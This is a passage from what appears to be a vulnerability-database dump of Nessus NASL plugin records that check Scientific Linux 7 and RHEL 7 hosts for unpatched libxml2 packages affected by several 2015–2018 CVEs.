exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:58:26", "description": "* libxml2: Use after free triggered by XPointer paths beginning with range-to * libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c * libxml2:\nDoS caused by incorrect error detection during XZ decompression * libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c * libxml2: Unrestricted memory usage in xz_head() function in xzlib.c * libxml2: Infinite loop caused by incorrect error detection during LZMA decompression", "cvss3": {}, "published": "2020-04-21T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : libxml2 on SL7.x x86_64 (20200407)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567"], "modified": "2020-04-24T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:libxml2", "p-cpe:/a:fermilab:scientific_linux:libxml2-debuginfo", "p-cpe:/a:fermilab:scientific_linux:libxml2-devel", "p-cpe:/a:fermilab:scientific_linux:libxml2-python", "p-cpe:/a:fermilab:scientific_linux:libxml2-static", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20200407_LIBXML2_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/135819", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(135819);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/24\");\n\n script_cve_id(\"CVE-2015-8035\", \"CVE-2016-5131\", \"CVE-2017-15412\", \"CVE-2017-18258\", \"CVE-2018-14404\", \"CVE-2018-14567\");\n\n script_name(english:\"Scientific Linux Security Update : libxml2 on SL7.x x86_64 (20200407)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"* libxml2: Use after free triggered by XPointer paths beginning with\nrange-to * libxml2: Use after free in\nxmlXPathCompOpEvalPositionalPredicate() function in xpath.c * libxml2:\nDoS caused by incorrect error detection during XZ decompression *\nlibxml2: NULL pointer dereference in xmlXPathCompOpEval() function in\nxpath.c * libxml2: Unrestricted memory usage in xz_head() function in\nxzlib.c * libxml2: Infinite loop caused by incorrect error detection\nduring LZMA decompression\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2004&L=SCIENTIFIC-LINUX-ERRATA&P=12531\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?988a1301\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-2.9.1-6.el7.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-debuginfo-2.9.1-6.el7.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-devel-2.9.1-6.el7.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-python-2.9.1-6.el7.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-static-2.9.1-6.el7.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:19:07", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:1190 advisory.\n\n - libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n - libxml2: Use after free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n - libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n - libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n - libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n - libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-04-01T00:00:00", "type": "nessus", "title": "RHEL 7 : libxml2 (RHSA-2020:1190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:libxml2", "p-cpe:/a:redhat:enterprise_linux:libxml2-devel", "p-cpe:/a:redhat:enterprise_linux:libxml2-python", "p-cpe:/a:redhat:enterprise_linux:libxml2-static"], "id": "REDHAT-RHSA-2020-1190.NASL", "href": "https://www.tenable.com/plugins/nessus/135071", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:1190. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135071);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_bugtraq_id(\n 77390,\n 92053,\n 102098,\n 105198\n );\n script_xref(name:\"RHSA\", value:\"2020:1190\");\n script_xref(name:\"IAVB\", value:\"2016-B-0083-S\");\n script_xref(name:\"IAVB\", value:\"2016-B-0113-S\");\n script_xref(name:\"IAVB\", value:\"2017-B-0169-S\");\n\n script_name(english:\"RHEL 7 : libxml2 (RHSA-2020:1190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:1190 advisory.\n\n - libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n - libxml2: Use after free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n - libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n - libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n - libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n - libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2015-8035\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2016-5131\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2017-15412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2017-18258\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2018-14404\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2018-14567\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:1190\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1277146\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1358641\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1523128\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1566749\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1595985\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1619875\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15412\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(252, 400, 476);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-static\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/optional/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/optional/os',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/optional/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/os',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/supplementary/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/debug',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/optional/debug',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/optional/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/optional/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/optional/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/optional/os',\n 'content/dist/rhel/client/7/7Client/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/client/7/7Client/x86_64/os',\n 'content/dist/rhel/client/7/7Client/x86_64/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/supplementary/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/supplementary/os',\n 'content/dist/rhel/client/7/7Client/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/optional/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/optional/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/source/SRPMS',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/supplementary/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/supplementary/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/highavailability/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/highavailability/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/optional/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/optional/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/optional/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/resilientstorage/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/resilientstorage/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap-hana/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap-hana/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap-hana/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/supplementary/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/supplementary/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/optional/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/optional/os',\n 'content/dist/rhel/power/7/7Server/ppc64/optional/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/os',\n 'content/dist/rhel/power/7/7Server/ppc64/sap/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/sap/os',\n 'content/dist/rhel/power/7/7Server/ppc64/sap/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/supplementary/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/supplementary/os',\n 'content/dist/rhel/power/7/7Server/ppc64/supplementary/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/highavailability/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/highavailability/os',\n 'content/dist/rhel/server/7/7Server/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/nfv/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/nfv/os',\n 'content/dist/rhel/server/7/7Server/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/optional/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/optional/os',\n 'content/dist/rhel/server/7/7Server/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/server/7/7Server/x86_64/os',\n 'content/dist/rhel/server/7/7Server/x86_64/resilientstorage/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/resilientstorage/os',\n 'content/dist/rhel/server/7/7Server/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/rt/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/rt/os',\n 'content/dist/rhel/server/7/7Server/x86_64/rt/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/sap-hana/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/sap-hana/os',\n 'content/dist/rhel/server/7/7Server/x86_64/sap-hana/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/sap/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/sap/os',\n 'content/dist/rhel/server/7/7Server/x86_64/sap/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/supplementary/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/supplementary/os',\n 'content/dist/rhel/server/7/7Server/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/highavailability/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/highavailability/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/optional/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/optional/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/optional/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/resilientstorage/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/resilientstorage/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/sap/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/sap/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/sap/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/supplementary/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/supplementary/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/optional/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/optional/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/supplementary/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/supplementary/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/supplementary/source/SRPMS',\n 'content/fastrack/rhel/client/7/x86_64/debug',\n 'content/fastrack/rhel/client/7/x86_64/optional/debug',\n 'content/fastrack/rhel/client/7/x86_64/optional/os',\n 'content/fastrack/rhel/client/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/client/7/x86_64/os',\n 'content/fastrack/rhel/client/7/x86_64/source/SRPMS',\n 'content/fastrack/rhel/computenode/7/x86_64/debug',\n 'content/fastrack/rhel/computenode/7/x86_64/optional/debug',\n 'content/fastrack/rhel/computenode/7/x86_64/optional/os',\n 'content/fastrack/rhel/computenode/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/computenode/7/x86_64/os',\n 'content/fastrack/rhel/computenode/7/x86_64/source/SRPMS',\n 'content/fastrack/rhel/power/7/ppc64/debug',\n 'content/fastrack/rhel/power/7/ppc64/optional/debug',\n 'content/fastrack/rhel/power/7/ppc64/optional/os',\n 'content/fastrack/rhel/power/7/ppc64/optional/source/SRPMS',\n 'content/fastrack/rhel/power/7/ppc64/os',\n 'content/fastrack/rhel/power/7/ppc64/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/debug',\n 'content/fastrack/rhel/server/7/x86_64/highavailability/debug',\n 'content/fastrack/rhel/server/7/x86_64/highavailability/os',\n 'content/fastrack/rhel/server/7/x86_64/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/optional/debug',\n 'content/fastrack/rhel/server/7/x86_64/optional/os',\n 'content/fastrack/rhel/server/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/os',\n 'content/fastrack/rhel/server/7/x86_64/resilientstorage/debug',\n 'content/fastrack/rhel/server/7/x86_64/resilientstorage/os',\n 'content/fastrack/rhel/server/7/x86_64/resilientstorage/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/source/SRPMS',\n 'content/fastrack/rhel/system-z/7/s390x/debug',\n 'content/fastrack/rhel/system-z/7/s390x/optional/debug',\n 'content/fastrack/rhel/system-z/7/s390x/optional/os',\n 'content/fastrack/rhel/system-z/7/s390x/optional/source/SRPMS',\n 'content/fastrack/rhel/system-z/7/s390x/os',\n 'content/fastrack/rhel/system-z/7/s390x/source/SRPMS',\n 'content/fastrack/rhel/workstation/7/x86_64/debug',\n 'content/fastrack/rhel/workstation/7/x86_64/optional/debug',\n 'content/fastrack/rhel/workstation/7/x86_64/optional/os',\n 'content/fastrack/rhel/workstation/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/workstation/7/x86_64/os',\n 'content/fastrack/rhel/workstation/7/x86_64/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'libxml2-2.9.1-6.el7.4', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-devel-2.9.1-6.el7.4', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'ppc64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'ppc64le', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-python-2.9.1-6.el7.4', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libxml2-static-2.9.1-6.el7.4', 'release':'7', 'rpm_spec_vers_cmp':TRUE}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n 